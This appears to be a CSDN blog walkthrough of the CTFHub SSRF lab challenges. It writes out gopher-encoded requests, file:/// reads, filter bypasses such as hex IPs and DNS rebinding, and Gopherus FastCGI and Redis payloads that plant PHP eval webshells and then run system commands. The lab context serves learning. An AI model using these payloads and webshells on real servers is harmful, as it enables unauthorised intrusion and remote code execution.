首页 > 其他分享 >CTFHub技能树 Web-SSRF系列通过全技巧(已完结)

CTFHub技能树 Web-SSRF系列通过全技巧(已完结)

时间:2024-07-25 12:28:42浏览次数:18  
标签:Web http SSRF 编码 CTFHub Flag url flag php

1. 内网访问

url后面输入http:// 127.0.0.1/flag.php,得到Flag

2. 伪协议读取文件

url后面输入file:///var/www/html/flag.php,然后右击页面查看页面源代码,得到Flag

3. 端口扫描

第一步:在url后面输入http://127.0.0.1:5000,对本页面抓包,右击抓包界面,发送到Intruder

第二步:点击Intruder,添加扫描位置

第三步:配置以下参数,开始攻击

第四步:点击长度》排序,找到和其他长度不一样的一条,点击美化找到Flag

4. POST请求

第一步:在url后加入http:127.0.0.1:80/flag.php访问,右击页面发现key,将key复制到输入框,回车访问

第二步:打开Burp Suite抓包,修改抓到的包

第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码

第四步:在url后加入gopher://127.0.0.1:80/_后面再跟上最后编码得到内容,访问得到flag

5. 上传文件

第一步:打开链接在url后面输入http://127.0.0.1:80/flag.php访问,右击页面》检查,选中如图input标签》右击》编辑HTML,添加<input type="sumbit" name="sumbit">,因为本页面没有提交按钮所以我们手动创建一个

第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变

第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码

第四步:在url后加入gopher://127.0.0.1:80/_后面再跟上最后编码得到内容,访问得到flag

6. FastCGI协议

第一步:打开kali,下载好工具Gopherus-master,在文件夹里打开终端

第二步:依次输入以下命令

python2 gopherus.py --exploit fastcgi

/var/www/html/index.php

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

生成写入木马的响应包,复制响应的内容

第三步:对上面响应的内容用在线URL工具编码

第四步:给目标网站写入木马,将编码好的内容复制到url后面并访问,发现有响应内容我们进行下一步

第五步:在网站后输入shell.php,去访问shell.php,没有响应错误说明木马植入成功

第六步:打开中国菜刀右击界面添加url链接,将上一步的访问的url复制到此处,添加参数cmd,双击运行

第七步:找到/flag文件打开,找到本题的flag

7. Redis协议

第一步:打开kali,下载好工具Gopherus-master,在文件夹里打开终端

第二步:依次输入以下命令

python2 gopherus.py --exploit redis

/var/www/html

PHPShell

<?php @eval($_GET['cmd']); ?>

生成写入木马的响应包,复制响应的内容

第三步:对上面响应的内容用在线URL工具编码

第四步:给目标网站写入木马,将编码好的内容复制到url后面并访问

第五步:在网站后输入shell.php,去访问shell.php,如果有响应的内容说明木马植入成功

第六步:在url上输入/shell.php?cmd=system(‘ls /’);找到flag的文件

第七步:在url上输入/shell.php?cmd=system(‘cat /刚刚的flag文件名’);找到flag

8. URL Bypass

url后面输入http://[email protected]:80/flag.php,得到Flag

9. 数字IP Bypass

url后面输入http://localhost/flag.php,得到Flag

或者将127.0.0.1转换成16进制7F000001,url后面输入http://0x7F000001/flag.php,得到Flag

10. 302跳转 Bypass

url后面输入http://localhost/flag.php,得到Flag

11. DNS重绑定 Bypass

第一步:在解析网站上获取解析到内网IP的域名并作访问即可获取其Flag

附:网站地址rbndr.us dns rebinding service

第二步:在url后面输入http://7f000001.7f000002.rbndr.us/flag.php,得到Flag

标签:Web,http,SSRF,编码,CTFHub,Flag,url,flag,php
From: https://blog.csdn.net/m0_59151303/article/details/140673856

相关文章

  • 5个步骤将Web项目部署到PetaExpress云服务器
    1.先登录PetaExpress云账号,选择云服务器,选择购买云服务器,选择您所需要的配置,包括cpu类型,操作系统镜像,以及系统盘,数据盘大小,点击下一步:建议选择2c2m型号来运行windows服务器系统,我在这里选择4c核心cpu,4G内存。请认真阅读全文,最后教你免费领取一台免费服务器。2.选择您想要网络类......
  • 抖音直播弹幕数据逆向:websocket和JS注入
    ......
  • .NET TCP、UDP、Socket、WebSocket
    做.NET应用开发肯定会用到网络通信,而进程间通信是客户端开发使用频率较高的场景。进程间通信方式主要有命名管道、消息队列、共享内存、Socket通信,个人使用最多的是Sokcet相关。而Socket也有很多使用方式,Socket、WebSocket、TcpClient、UdpClient,是不是很多?HttpClient与TcpClien......
  • Cookie - Web开发
    Cookie是存储在用户浏览器中的小型文本文件,用于在客户端和服务器之间传递信息。Cookie通常用于跟踪用户会话、存储用户偏好设置、记录用户行为等。Cookie是Web开发中常用的技术之一,用于增强用户体验和实现各种功能。Cookie的定义Cookie是由服务器发送给客户端的一段数据,客......
  • @Slf4j注解 - javaweb日志记录
    1.引言在现代的JavaWeb开发中,日志记录是一个非常重要的组成部分。良好的日志记录可以帮助开发者快速定位问题、监控系统运行状态以及进行性能调优。@Slf4j注解是Lombok库提供的一个便捷工具,用于简化日志记录的代码编写。本文将详细讲解@Slf4j注解的相关内容,包括其概念、......
  • python webbrowser.open 不使用默认浏览器
    对你们来说这是一个好奇的家伙..在我的python程序中webbrowser.open('etc..')打开MicrosoftEdge现在奇怪的是,我在与opensChrome(我的默认值)稍有不同的文件夹中还有另一个python程序关于发生了什么的任何想法吗?!!(我知道有人问过类似的问题,但......
  • selenium.webdriver.Firefox 与 FirefoxOptions().add_argument('--headless') 不返回
    我注意到Firefox中的无头选项会在后台运行Firefox,而不会附加任何窗口,而且我还没有找到一种方法可以在后台运行Firefox,同时仍保留Firefox窗口的hwnd能够使用。我开始使用pyvda来获取AppViewFirefox,但是pyvda.get_apps_by_z_order没有返回任......
  • 将 Streaming Assistants API 与 Websocket 结合使用
    我正在开发一个FastAPI应用程序,其中使用WebSockets从Assistant的API事件处理程序实时发送文本增量。但是,负责发送这些增量的任务仍处于PENDING状态并且永远不会运行。因此,客户端不会收到预期的数据。症状WebSocket连接打开并收到消息。为处理WebSo......
  • javaWeb_JSP
    首先要对项目的pom.xml进行添加依赖点击查看代码<dependencies><!--Servlet依赖--><dependency><groupId>javax.servlet</groupId><artifactId>servlet-api</artifactId><version>2.5</version>&l......
  • web专项
    CTF-WEB-CTFhub注:以ctfhub练习网站为例!一:信息泄露1、目录遍历漏洞(1)原理:web服务器或者web应用程序对用户输入的文件名称未进行严格的验证过滤而导致的一种安全漏洞;让攻击者可以利用一些特殊的字符可以绕过服务器的安全限制、访问任意文件;就是没有过滤用户输入的./等目录跳跃符......